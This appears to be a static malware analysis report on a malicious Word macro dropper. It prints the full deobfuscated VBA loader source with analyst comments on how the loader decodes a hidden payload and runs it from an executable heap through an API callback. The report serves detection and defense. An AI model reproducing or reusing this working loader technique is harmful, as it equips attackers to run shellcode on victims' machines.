Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1e4b3a644499bff0…

MALICIOUS

Office (OLE)

204.5 KB Created: 2016-10-06 16:14:00 Authoring application: Microsoft Office Word First seen: 2018-01-23
MD5: e5b10e5e73a796586c51448254c14949 SHA-1: fd0a0abf6c31ff0642cfd5f94a587d572e5dbacb SHA-256: 1e4b3a644499bff0de4b3879a18fb5f1ec62e3574ed4f176213ae51305fb34bf
90 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with a critical heuristic firing for a dropper agent. The presence of VBA macros, specifically a Document_Open macro, indicates an attempt to automatically execute code upon opening. The VBA script itself appears to be obfuscated but contains elements suggesting it is designed to download and execute a second-stage payload, a common dropper behavior.

Heuristics 4

  • ClamAV: Doc.Dropper.Agent-6421647-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6421647-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    End Function
    Private Sub Document_Open()
    Dim escapist As Byte
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# — In document text (OLE body)
    • http://ns.adobe.com/camera-raw-settings/1.0/ — In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/ — In document text (OLE body)
    • http://purl.org/dc/elements/1.1/ — In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ — In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# — In document text (OLE body)
    • http://www.iec.ch — In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12566 bytes
SHA-256: 3c24f99b406cdfc02b109689c0032b12329b60b80c46fa60c9bf1f73552445a4
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Document class module: this is the module that hosts Document_Open (the auto-run
' entry point flagged by OLE_VBA_DOCOPEN). The Attribute lines above are the normal
' Word document-module header and are not indicators on their own.
'
' Module-level Variants. In this listing every reference to them is either a
' self-assignment ("fullhanded = fullhanded") or throw-away arithmetic
' ("inspissate = inspissate - 96"); none of their values feed the decode or
' execution path, so they read as decoy state padding the real control flow.
Dim fullhanded
Dim inspissate
Dim undernsong
Dim soupstrainer

Sub PrintForCall()
   ' Not called anywhere in this listing. Activates each open document in turn;
   ' looks like benign filler lifted from a Word macro sample.
   Dim aDoc As ThisDocument
   For Each aDoc In Documents
      aDoc.Activate
   Next
End Sub

' cimicidae(sugarplum, repellant): copies the decoded payload into the heap buffer.
'   sugarplum - destination address (the HeapAlloc result computed in podiatrist).
'   repellant - Variant holding the String returned by agglutination.anounce.
' Both copies go through "ingredient", which the agglutination module declares as
' ntdll!RtlMoveMemory. The loop and the remaining assignments are decoys whose
' results are never read. The function has no meaningful return value.
Function cimicidae(sugarplum, repellant)
Dim competitively As Variant
Dim handbarrow As Variant
inspissate = inspissate - 96
Dim frustrating As Integer
Dim sledder As Long
Dim corruption As Byte
Dim antimagnetic As String
Dim neckband As Long
' RtlMoveMemory(&sledder, VarPtr(repellant) + 8, 4): reads 4 bytes at offset 8 of
' the VARIANT, which is where a VT_BSTR Variant keeps its string pointer. Only 32
' bits are read, so on 64-bit Office this would capture just the low half of the
' pointer — presumably the 32-bit build is the one the author relies on; confirm.
ingredient sledder, ByVal VarPtr(repellant) + 8, 4
undernsong = undernsong / 388
neckband = sugarplum
' Decoy loop: froelichia is assigned twice and never read.
For dulia = 15 To 66
bioclimatology = 66
fullhanded = soupstrainer
froelichia = "myo" & LCase$("glObin")
froelichia = LCase$("aP") & "hid"
Next dulia

' RtlMoveMemory(heap buffer, string data, 3299): 3299 is also the HeapAlloc size
' requested in podiatrist. The decoded String is presumably 3216 bytes
' ((4288 \ 4) * 3, see anounce), so the copy reads a little past the decoded data;
' when carving the payload, the first 3216 bytes are the meaningful ones.
ingredient ByVal neckband, ByVal sledder, 3299
soupstrainer = "costerman"
End Function
' podiatrist(): the actual dropper logic, called from Document_Open. In order:
'   1. read the encoded payload from the ControlTipText of control "byelaw" on the
'      UserForm module "producing";
'   2. base64-decode it with agglutination.anounce;
'   3. HeapCreate with flOptions = 262144 (&H40000, the value of
'      HEAP_CREATE_ENABLE_EXECUTE), then HeapAlloc 3299 bytes from that heap;
'   4. RtlMoveMemory the decoded bytes into the buffer (via cimicidae);
'   5. call EnumUILanguagesW ("siren") with buffer + offset as the callback pointer,
'      so the copied bytes run as code; the document's own path is passed as lParam.
' The interleaved loops, If blocks and string literals are decoys — none of their
' results feed steps 1-5. The identifiers are random dictionary words.
' Detection note: Declare aliases for HeapCreate/HeapAlloc/RtlMoveMemory/
' EnumUILanguagesW together with a ControlTipText read is the combination to hunt for.
Sub podiatrist()
Dim fortuitous As Byte
Dim xanthomonad As Long
' Step 1: the encoded payload is stored in a form control's tooltip text.
unrip = producing.byelaw.ControlTipText
' Step 2: decode it (anounce is a base64 decoder, see the agglutination module).
reversibility = agglutination.anounce(unrip)
' Decoy loop: adenovirus is assigned and never read.
For aleut = 22 To 73
extravagance = 73
fullhanded = fullhanded
adenovirus = LCase$("SC") & LCase$("Up")
adenovirus = UCase$("RE") & UCase$("FUsE")
Next aleut

penthesilean = "perisher"
bites = "priestess"
' diener becomes HeapCreate's size arguments: on Win64 a user type wrapping a LongPtr
' set to 0 (and passed ByRef by the Win64 Declare, so the callee would receive an
' address rather than 0 — confirm whether the 64-bit path actually works); on 32-bit
' a plain 0.
#If Win64 Then
Dim patagonia As Variant
Dim diener As chaotically
Dim somatism As LongPtr
diener.header = 0
Dim pomade As Long
#Else
Dim oahu As String
diener = 0
Dim saimiri As Byte
Dim somatism As Long
#End If
haunt = 0
usherette = "bal"
alnashar = 4096
candleholder = 60
numerate = 75
' 60 + 75 < 0 is never true: the Else branch always runs and only touches decoy globals.
If candleholder + numerate < 0 Then
candleholder = Left("unprcapital", 4) & UCase$("oNOuNcE") & UCase$("AbLe")
fullhanded = fullhanded
deft = Right$("valorousab", 2) & Left("iesdilatation", 3)
Else
inspissate = inspissate * 4
numerate = 38
End If

' Step 3: 79 - 13 + 94 + 261984 = 262144 = &H40000, used as HeapCreate's flOptions
' (HEAP_CREATE_ENABLE_EXECUTE), i.e. allocations from this heap are executable.
pertinacious = 79 - 13 + 94 + 261984
lathi = suffice(pertinacious, diener, diener)
' HeapAlloc(heap, 0, 3299): destination buffer for the decoded payload.
somatism = istic(lathi, 0, 3299)
pelican = Mid("blockburjungian", 6, 3) & "gomas" & "ter"
Dim correctable As String
horometry = "concessionaire"
pagan = Mid("apatiteancquo", 8, 3) & UCase$("hORag") & Right$("nudgee", 1)
' Full path of this document (ravishing = Path & "/" & Name), later handed to the
' payload as lParam in step 5.
correctable = ravishing
influx = 55
chrysolite = 54
' 55 + 54 < 36 is never true: the Else branch runs and only sets decoy values.
If influx + chrysolite < 36 Then
influx = Right$("attarcr", 2) & LCase$("IsTO") & Right$("bloodguiltybalite", 6)
soupstrainer = soupstrainer
impenitent = LCase$("Bl") & Left("indsamedeboue", 4)
Else
soupstrainer = "adynamic"
chrysolite = 2
End If

macrocosmic = reversibility
frost = "leontocebus"
' Step 4: copy the decoded bytes into the executable heap buffer.
cimicidae somatism, macrocosmic
sanctification = LCase$("CHE") & Left("eseboscience", 5) & LCase$("ARd")
' Entry-point offset into the buffer: 105 + 471 = 576 on Win64,
' 81 - 108 - 96 + 629 + 1698 = 2204 on Win32. Presumably the decoded blob holds both
' a 32- and a 64-bit variant with different entry points — confirm by disassembly.
#If Win64 Then
Dim catechize As String
conservancy = "compromise"
agglutinate = "ruddle"
exciseman = "cruse"
teachership = 105 + 471
#ElseIf (Win32) Then
teachership = 81 - 108 - 96 + 629 + 1698

#End If
Dim troupe As Long
Dim barry As Variant
Dim boise As Long
boise = 0
Dim flowmeter As Long
' Step 5: EnumUILanguagesW(lpEnumFunc = buffer + offset, flags = 0, lParam = document
' path). The API calls lpEnumFunc back, so this is the line where the copied bytes
' start executing. Note flowmeter is a Long even on the LongPtr (Win64) path.
flowmeter = somatism + teachership
plucky = siren(flowmeter, boise, correctable)
' Decoy loop: hazards is never read.
For et = 33 To 71
avouch = 71
inspissate = undernsong + 481
hazards = LCase$("fe") & Left("ndrecohabitation", 4)
hazards = Left("cadecession", 2) & Mid("struthionidaeffeinealligation", 14, 6)
Next et

End Sub

' ravishing(): returns the full path of the current document as
' ThisDocument.Path & "/" & ThisDocument.Name. podiatrist passes this string to the
' payload (as EnumUILanguagesW's lParam), so the shellcode is presumably given its own
' host document to locate — confirm by disassembly. The loop is a decoy.
Function ravishing()
Dim boutonniere As String
Dim herborist As Variant
' Decoy loop: morphologically is assigned twice and never read.
For charades = 17 To 51
unhelpfully = 51
soupstrainer = soupstrainer
morphologically = Right$("gomphotheriidaemu", 2) & UCase$("mBLi") & Left("ngsexlimited", 2)
morphologically = Right$("lombardba", 2) & Mid("bawlckwacult", 5, 4) & Left("terenrich", 3)
Next charades

contending = ThisDocument.Path
ravishing = contending & "/" & ThisDocument.Name
End Function
' Document_Open(): auto-run handler (fires when Word opens the document, subject to
' the macro security setting). Its only meaningful statement is the call to
' podiatrist; everything else is decoy string building. This is the line flagged by
' the OLE_VBA_DOCOPEN heuristic above.
Private Sub Document_Open()
Dim escapist As Byte
Dim polarimeter As Long
experimentist = LCase$("eq") & Mid("virginityuiprice", 10, 3)
mandrill = "gregorian"
' Hands control to the dropper routine.
podiatrist
' Decoy loop: fatherinlaw is assigned twice and never read.
For kites = 12 To 51
groggy = 51
soupstrainer = soupstrainer
fatherinlaw = LCase$("pe") & Mid("israelilagicmonoculous", 8, 5)
fatherinlaw = LCase$("SU") & Mid("bedouincklingcoherence", 8, 6)
Next kites
End Sub

Attribute VB_Name = "agglutination"
' Standard module "agglutination": holds the Win32 API imports (under random alias
' names) and the base64 decoder. The song-lyric comment lines throughout are filler.
' Only four imports are actually used by the listing, with the same alias in both
' the Win64 and the 32-bit branch:
'   suffice    -> kernel32!HeapCreate    (executable heap)
'   istic      -> kernel32!HeapAlloc     (payload buffer)
'   ingredient -> ntdll!RtlMoveMemory    (copy decoded bytes)
'   siren      -> kernel32!EnumUILanguagesW (callback pointer = payload, runs it)
' GetDC, RemoveDirectoryA, EndDialog, GetModuleHandle and TlsAlloc are declared but
' never called in this listing and appear to be decoys.
'The stress in life
'Life is gone
#If Win64 Then
'Let it all go and in time you will find
'Can't you see
' Wrapper type used by podiatrist for HeapCreate's size arguments on Win64.
Public Type chaotically
'I can't escape
'I'm not okay
header As LongPtr
'Life is gone
'The pressure seems to get me down
End Type
'Life is gone
'I can't escape
' EnumUILanguagesW: used — first argument is the callback that will be invoked.
Public  Declare PtrSafe Function siren Lib "kernel32" Alias "EnumUILanguagesW" (ByVal lpEnumFunc As Any, ByVal flags As Any, lParam As Any) As LongPtr
'The pressure seems to get me down
'Numb me 'til I won't feel pain again
' GetDC: not called in this listing.
Public Declare PtrSafe Function cacus Lib "user32" Alias "GetDC" (ByVal conversationalist As LongPtr) As LongPtr
'I can't deal with your lies
'Poisons me with time
' RemoveDirectoryA: not called in this listing.
Public Declare PtrSafe Function arariba Lib "kernel32" Alias "RemoveDirectoryA" (acanthocephala As LongPtr)
'I am no one
'The pressure seems to get me down
' EndDialog: not called in this listing.
Public Declare PtrSafe Function brachiopod Lib "user32" Alias "EndDialog" (ByVal city As LongPtr,nResult As LongPtr) As LongPtr
'I wish I could watch you drown and die
'They have said
' GetModuleHandle: not called in this listing.
Public Declare PtrSafe Function subvert Lib "kernel32" Alias "GetModuleHandle" (lpModuleName As LongPtr)
'I don't fit in
'I wish I could watch you drown and die
' RtlMoveMemory: used by cimicidae to copy the decoded payload.
Public  Declare PtrSafe Sub ingredient Lib "ntdll" Alias "RtlMoveMemory" (affronterai As Any, punchinello As Any, ByVal gurgel As LongPtr)
'I can't escape
'I am no one
' TlsAlloc: not called in this listing.
Public Declare PtrSafe Function anomalousness Lib "kernel32" Alias "TlsAlloc" () As LongPtr
'Poisons me with time
'I lost my mind
' HeapAlloc: used by podiatrist (3299 bytes).
Public  Declare PtrSafe Function istic Lib "kernel32" Alias "HeapAlloc" (ByVal oropharynx As LongPtr, ByVal ameboid As  LongPtr, ByVal fences As LongPtr) As LongPtr
'Can't you see
'Let it all go and in time you will find
' HeapCreate: used by podiatrist with flOptions = &H40000. Note the size arguments
' are declared ByRef as the user type above, unlike the ByVal Longs in the 32-bit branch.
Public  Declare PtrSafe Function suffice Lib "kernel32" Alias "HeapCreate" (ByVal rattle As LongPtr,card As chaotically, magnetosphere As chaotically) As LongPtr
'I am no one
'Life has always been a problem

'And take my time
'Life is gone
#Else
'It's like a needle in my spine
'I am no one
' HeapAlloc (32-bit): used by podiatrist.
Public Declare Function istic Lib "kernel32" Alias "HeapAlloc" (ByVal overcompensation As Long, ByVal backroom As Long, ByVal angelus As Long) As Long
'It stings inside
'Let it all go and in time you will find
' EnumUILanguagesW (32-bit): used — callback pointer = payload buffer.
Public Declare Function siren Lib "kernel32" Alias "EnumUILanguagesW" (ByVal lpEnumFunc As Any, ByVal atonement As Any, lParam As Any) As Long
'I don't fit in
'I don't fit in
' RemoveDirectoryA: not called in this listing.
Public Declare Function amenra Lib "kernel32" Alias "RemoveDirectoryA" (arminius As Long)
'And take my time
'I don't fit in
' RtlMoveMemory (32-bit): used by cimicidae.
Public Declare Sub ingredient Lib "ntdll" Alias "RtlMoveMemory" (cooperate As Any, conscience As Any, ByVal jerrybuilder As Long)
'Let it all go and in time you will find
'Nothing is real and dies in the lies
' GetDC: not called in this listing.
Public Declare Function miscorrect Lib "user32" Alias "GetDC" (footprint As Long) As Long
'They have said
'I am no one
' GetModuleHandle: not called in this listing.
Public Declare Function quadrate Lib "kernel32" Alias "GetModuleHandle" (lpModuleName As Long)
'Life is gone
'Life is gone
' EndDialog: not called in this listing.
Public Declare Function overwhelming Lib "user32" Alias "EndDialog" (ByVal eccentricity As Long, aviation As Long) As Long
'I wish I could watch you drown and die
'I don't fit in
' TlsAlloc: not called in this listing.
Public Declare Function fuzzy Lib "kernel32" Alias "TlsAlloc" () As Long
'Life is gone
'Life is gone
' HeapCreate (32-bit): used by podiatrist; all three arguments ByVal Long here.
Public Declare Function suffice Lib "kernel32" Alias "HeapCreate" (ByVal scarecrow As Long, ByVal retention As Long, ByVal catamount As Long) As Long
'I'm not okay
'I don't fit in

'Life is gone
'And take my time
#End If
'I don't fit in
'And take my time
' sowbane(a, b): integer division a \ b. Used by anounce to shift the decoded
' 24-bit group right by 16 and 8 bits (dividing by 65536 and 256).
Function sowbane(affrayment, counselorship)
sowbane = affrayment \ counselorship
End Function
' halenia(a, b): bitwise And. Used by anounce to mask out each byte of the decoded
' 24-bit group (&HFF0000, &HFF00, &HFF).
Function halenia(bolete, buxus)
halenia = bolete And buxus
End Function
' anounce(cockade): base64 decoder with one extra twist.
'   cockade - the encoded text read from the form control (exactly 4288 characters
'             are consumed; shorter input would make Mid$/Asc fail).
' Each character code is first incremented by 2, so the stored text is the standard
' base64 alphabet with every code reduced by 2. The shifted bytes are then decoded
' 4-at-a-time into 3 output bytes: (4288 \ 4) * 3 = 3216 bytes, returned by
' assigning the Byte array straight to the String return value.
' All the loose arithmetic below resolves to base64 constants:
'   luckless = 4096 (64^2), blowfish = 262144 (64^3), cricket = 64,
'   billboard = &HFF0000, weapons = 65280 (&HFF00), conspectuity = 255,
'   arginine = 65536, backwoods = 256, mongo = 4, wronged = 3, begum = 4,
'   aepyorniformes = 2, scholarship = 122 ('z'), baal = 255.
' buglehorn, auld, michigander, prosternation and the While/For decoy loops are unused.
' No padding ('=') handling is present, consistent with a fixed-size blob.
Function anounce(cockade) As String
Dim charitably As Long
Dim sabreur(255) As Byte
Dim aural(63) As Long
Dim hymenophyllaceae As Long
Dim commutability(63) As Long
Dim supernumernry(63) As Long
inspissate = undernsong And 443

Dim grisette() As Byte
Dim camarade As Integer

Dim gasman As Integer
fullhanded = fullhanded

Dim unsuccessfully As Long
Dim hunkpapa As Long

Dim pigeonhole As Long
Dim ovate() As Byte
Dim orbiculate As String
Dim downstage As Long

' 57 + 4039 = 4096 (64^2); 23 + 56 + 6 + 65195 = 65280 (&HFF00).
luckless = 57 + 4039
weapons = 23 + 56 + 6 + 65195
Dim coxcomical As Long

' cricket = 64; 124 + 67 + 261953 = 262144 (64^3); buglehorn = 63 (unused).
cricket = 64
blowfish = 124 + 67 + 261953
buglehorn = 100 - 120 + 83
Dim rez As Byte

' auld and michigander are never read; conspectuity = 255; backwoods = 256.
auld = 103 + 94 + 118 + 257733
michigander = 61 + 117 + 114 + 3740
conspectuity = 125 + 38 + 97 - 5
backwoods = 75 - 71 + 252
Dim pallone As Variant

' billboard = &HFF0000; prosternation is never read; arginine = 65536.
billboard = 16711680
prosternation = 16515072
arginine = 34 + 57 - 45 + 65490
Dim clavariaceae As Variant
Dim poker() As Byte
' Read the first 4288 characters of the input into a Byte array.
ReDim poker(4287)
absorbate = 4288
For i = 1 To absorbate
meow = Mid$(cockade, i, 1)
maidenhead = (Asc(meow))
brood = Right$("countshi", 2) & Right$("cablestri", 4) & Right$("hugonem", 4)
poker(i - 1) = maidenhead
Next
Dim cleaners As Integer
' Decoy loop.
scolion = 3
While scolion < 8
scolion = scolion + 1
undernsong = undernsong + 418
Wend

' The extra layer: add 2 to every character code to recover real base64 text.
hierarchically = UBound(poker)
hopsacking = 35
For crackdown = 0 To hierarchically
poker(crackdown) = poker(crackdown) + 2
Next crackdown
' Decoy loop: sapient is never read.
For serene = 3 To 57
lombardy = 57
inspissate = inspissate \ 391
sapient = Mid("electriciandetinsanely", 12, 3) & UCase$("RimeNtAl")
sapient = Right$("balkinessjo", 2) & Mid("breechclothnahlycaena", 12, 3)
Next serene

' Build the base64 reverse lookup table sabreur:
'   'A'-'Z' (65-90)  -> 0-25
'   'a'-'z' (97-122) -> 26-51   (x - 71)
'   '0'-'9' (48-57)  -> 52-61   (x + 8 - 127 + 123 = x + 4)
'   '+' (43) -> 62, '/' (47) -> 63
gasman = 0
scholarship = 122
baal = 255
For unsuccessfully = 0 To baal
Select Case unsuccessfully
Case 65 To 90
sabreur(unsuccessfully) = unsuccessfully - 65
Case 97 To scholarship
sabreur(unsuccessfully) = unsuccessfully - 71
Case 48 To 57
sabreur(unsuccessfully) = unsuccessfully + 8 - 127 + 123
Case 43
sabreur(unsuccessfully) = 62
Case 47
sabreur(unsuccessfully) = 63
End Select
Next unsuccessfully
' Precomputed multipliers for the 4 sextets: v*64, v*4096, v*262144 (chasser = multiply).
For unsuccessfully = 0 To 63
supernumernry(unsuccessfully) = chasser(unsuccessfully, cricket)
aural(unsuccessfully) = chasser(unsuccessfully, luckless)
commutability(unsuccessfully) = chasser(unsuccessfully, blowfish)
Next unsuccessfully
' Decoy loop.
wishes = 12
While wishes < 15
wishes = wishes + 1
inspissate = inspissate \ 55
Wend

' Output buffer: (4288 \ 4) * 3 bytes (mongo = 12 - 54 - 76 + 122 = 4).
grisette = poker
mongo = 12 - 54 - 76 + 122
ReDim ovate((((UBound(grisette) + 1) \ mongo) * 3) - 1)
' Decoy loop: roadster is never read.
For thistly = 41 To 51
sapling = 51
soupstrainer = "alchemic"
roadster = UCase$("De") & "mijo" & "ur"
roadster = "ap" & UCase$("hAKI") & UCase$("a")
Next thistly

' wronged = 3 (index of the 4th char), begum = 4 (step), aepyorniformes = 2.
wronged = 56 - 42 + 7 - 18
fullhanded = soupstrainer

inspissate = undernsong / 132

begum = wronged + 1
aepyorniformes = 31 - 32 + 3
' Main decode loop: combine 4 sextets into a 24-bit value
' (c0*262144 + c1*4096 + c2*64 + c3), then split it into 3 bytes:
'   (v And &HFF0000) \ 65536, (v And &HFF00) \ 256, v And &HFF.
For hymenophyllaceae = 0 To UBound(grisette) Step begum
coexistence = grisette(hymenophyllaceae)
pigeonhole = commutability(sabreur(coexistence)) _
 + aural(sabreur(grisette(hymenophyllaceae + 1))) + supernumernry(sabreur(grisette(hymenophyllaceae + 2))) + sabreur(grisette(hymenophyllaceae + wronged))
unsuccessfully = halenia(pigeonhole, billboard)
ovate(charitably) = sowbane(unsuccessfully, arginine)
unsuccessfully = halenia(pigeonhole, weapons)
ovate(charitably + 1) = sowbane(unsuccessfully, backwoods)
ovate(charitably + aepyorniformes) = halenia(pigeonhole, conspectuity)
charitably = charitably + aepyorniformes + 1
Next hymenophyllaceae
' Byte array assigned to the String return: the decoded bytes become the string's raw bytes.
anounce = ovate
End Function

' chasser(a, b): plain multiplication. Used by anounce to build the 64/4096/262144
' multiplier tables for the four base64 sextets.
Function chasser(courageous, acception)
chasser = courageous * acception
End Function

Sub TemplatesDoChange()
    ' Not called anywhere in this listing, and strCurDoc/strDocPath/strTemplateB are
    ' not defined in it; looks like filler lifted from a Word macro example (opens
    ' each document named by Dir, swaps its attached template, saves and closes).
    Dim CurDoc As Document
    Do While strCurDoc <> ""
         Set CurDoc = Documents.Open(FName:=strDocPath & strCurDoc)
        CurDoc.AttachedTemplate = strTemplateB
        CurDoc.Close wdSaveChanges
        strCurDoc = Dir
    Loop
End Sub



Attribute VB_Name = "producing"
Attribute VB_Base = "0{D49F5CA7-F1C1-4117-A68E-D10E8F1924EC}{A7C12257-AF1F-469E-A10E-A5E77398E32D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Module "producing" has no VBA code; the GUID pair in VB_Base suggests a UserForm
' designer module. podiatrist reads producing.byelaw.ControlTipText, so the encoded
' payload lives in the ControlTipText property of a control named "byelaw" on this
' form. That property is stored in the form's binary stream, not in the extracted
' VBA source above, and must be carved from the form storage separately.

Attribute VB_Name = "whitish"
Attribute VB_Base = "0{DCB58BD7-81CC-4FEE-8775-9A9A830BD59C}{0A3CA1CA-8CEC-4FD5-B377-2ABB5C8EDFCD}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Second form-style module (same VB_Base shape as "producing"). Nothing in this
' listing references it; presumably a decoy or leftover — its control properties
' may still be worth inspecting when carving the form streams.